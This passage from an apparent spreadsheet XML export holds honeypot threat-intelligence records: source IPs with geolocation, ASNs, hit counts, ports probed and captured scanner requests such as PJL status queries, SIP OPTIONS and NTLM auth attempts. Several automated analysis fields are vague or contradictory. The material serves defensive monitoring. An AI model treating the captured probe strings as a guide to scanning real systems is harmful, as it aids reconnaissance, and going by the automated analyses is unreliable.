(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9b4:8d0c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze."/>
    <m/>
  </r>
  <r>
    <x v="541"/>
    <x v="541"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T20:10:05"/>
    <d v="2024-04-02T06:28:00"/>
    <d v="2025-04-28T20:10:05"/>
    <n v="313"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;NA&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_PJL_H19&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_IMAP_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;80&amp;&amp;NA&amp;&amp;3306&amp;&amp;443&amp;&amp;5432&amp;&amp;9100&amp;&amp;25&amp;&amp;21&amp;&amp;3389&amp;&amp;110&amp;&amp;445&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;query&amp;&amp;request&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.255.123.181:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 156.244.37.11:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.158,55392)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '203.29.241.98:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.158,37816)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.158,43982)}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.79.122:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 103.113.68.70:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.158;rport=53005'}}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.158;rport=34955'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.158,55136)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (FHAGkLoH,)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.234.67.80:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '185.250.150.39:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '185.250.150.39:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/version'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '149.102.153.168:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.250.150.39:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8d9e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No POP3 connections were made to the monitored service, indicating a potential lack of malicious activity via this service. &amp;&amp; No available log data provided for analysis."/>
    <m/>
  </r>
  <r>
    <x v="542"/>
    <x v="542"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T19:42:19"/>
    <d v="2025-04-28T19:42:19"/>
    <d v="2025-04-28T19:42:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:ae85"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="543"/>
    <x v="543"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T19:37:55"/>
    <d v="2025-04-28T19:37:55"/>
    <d v="2025-04-28T19:37:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IA"/>
    <s v="Iowa"/>
    <s v="Dickinson"/>
    <s v="Arnolds Park"/>
    <s v="4847187"/>
    <s v="51331"/>
    <s v="43.3727"/>
    <s v="-95.1239"/>
    <s v="13213"/>
    <s v="UK2NET-AS"/>
    <s v="UK-2 Limited"/>
    <s v="hosting"/>
    <s v="Hosting Services, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ced9:ce6a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="544"/>
    <x v="544"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T19:26:49"/>
    <d v="2025-04-28T19:26:49"/>
    <d v="2025-04-28T19:26:49"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_FTP_HC1"/>
    <s v="21"/>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FTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d7:ad5b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="545"/>
    <x v="545"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T18:51:07"/>
    <d v="2025-04-28T18:51:07"/>
    <d v="2025-04-28T18:51:07"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Jaladarsini Layout)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="13.0292"/>
    <s v="77.5719"/>
    <s v="135724"/>
    <s v="PVTABNL-AS"/>
    <s v="Allnet Broadband Network PVT LTD"/>
    <s v="consumer"/>
    <s v="Allnet Broadband Network Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6745:17b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="546"/>
    <x v="546"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T18:50:16"/>
    <d v="2024-11-28T12:17:29"/>
    <d v="2025-04-28T18:50:16"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Satara"/>
    <s v="Satara"/>
    <s v="1257055"/>
    <s v="NA"/>
    <s v="17.6859"/>
    <s v="73.9933"/>
    <s v="17665"/>
    <s v="ONEOTT INTERTAINMENT LIMITED"/>
    <s v="ONEOTT iNTERTAINMENT LIMITED"/>
    <s v="business"/>
    <s v="Oneott Intertainment Limited"/>
    <s v="2015-11-10"/>
    <s v="IMCL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67c7:c37a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="547"/>
    <x v="547"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T18:50:16"/>
    <d v="2024-05-21T22:08:59"/>
    <d v="2025-04-28T18:50:16"/>
    <n v="461"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="22&amp;&amp;36228&amp;&amp;22&amp;&amp;445&amp;&amp;80&amp;&amp;1080&amp;&amp;443&amp;&amp;389&amp;&amp;5900&amp;&amp;46390&amp;&amp;1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Rajkot"/>
    <s v="Rajkot (Jagnath Plot)"/>
    <s v="1258847"/>
    <s v="360004"/>
    <s v="22.2934"/>
    <s v="70.7906"/>
    <s v="45117"/>
    <s v="Ishan's Network"/>
    <s v="INPL's"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection&amp;&amp;login"/>
    <s v="None&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b36:aa26"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This indicates an attempted connection to a MySQL service without any actual data being sent or received, suggesting a potential reconnaissance or scanning activity by an attacker trying to identify vulnerabilities. The lack of any data exchange makes it difficult to determine the purpose of the attempt. It could be a probe for potential exploitation."/>
    <s v="SQL Attack"/>
  </r>
  <r>
    <x v="548"/>
    <x v="548"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T18:20:08"/>
    <d v="2025-04-28T18:20:08"/>
    <d v="2025-04-28T18:20:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Mumbai"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:8b42"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log indicates an incoming connection attempt via telnet service, but no further action was taken indicating potential probing or reconnaissance activity. _x000a_The lack of data suggests the connection was either closed immediately or not fully established._x000a_No malicious activity was detected in this instance. &amp;&amp; No TELNET activity was detected, suggesting potential evasion or avoidance of TELNET-based attacks. This could be an attempt to blend in with legitimate traffic. The lack of TELNET activity might indicate a sophisticated attacker avoiding standard monitoring methods."/>
    <m/>
  </r>
  <r>
    <x v="549"/>
    <x v="549"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T18:12:45"/>
    <d v="2023-11-28T14:02:58"/>
    <d v="2025-04-28T18:12:45"/>
    <n v="279"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_LDAP_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;47666&amp;&amp;389&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d2f5:5e61"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is likely scanning for open ports and services on a network, attempting to identify potential entry points for further exploitation. &amp;&amp; No LDAP activity was detected during this time period, which could indicate that an attacker attempted to exploit or scan for LDAP vulnerabilities but was unsuccessful. This lack of activity may also suggest that the system is not configured to use LDAP or is not actively listening for LDAP connections."/>
    <s v=" Portscanner/Probe Scanner"/>
  </r>
  <r>
    <x v="550"/>
    <x v="550"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T18:11:46"/>
    <d v="2025-02-25T22:37:18"/>
    <d v="2025-04-28T18:11:46"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="NA"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="NA"/>
    <s v="19.0728"/>
    <s v="72.8826"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7360:40a4"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="There is insufficient information to analyze, as there is no log data provided."/>
    <m/>
  </r>
  <r>
    <x v="551"/>
    <x v="551"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T18:11:46"/>
    <d v="2024-12-22T17:14:25"/>
    <d v="2025-04-28T18:11:46"/>
    <n v="146"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_TELNET_H2"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Ubatuba"/>
    <s v="Ubatuba"/>
    <s v="3445847"/>
    <s v="NA"/>
    <s v="-23.4339"/>
    <s v="-45.0711"/>
    <s v="268645"/>
    <s v="FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="business"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da4:b104"/>
    <s v="None&amp;&amp;C-U&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="552"/>
    <x v="552"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T18:11:03"/>
    <d v="2024-06-21T19:59:34"/>
    <d v="2025-04-28T18:11:03"/>
    <n v="1100"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5900&amp;&amp;87&amp;&amp;NA"/>
    <s v="False"/>
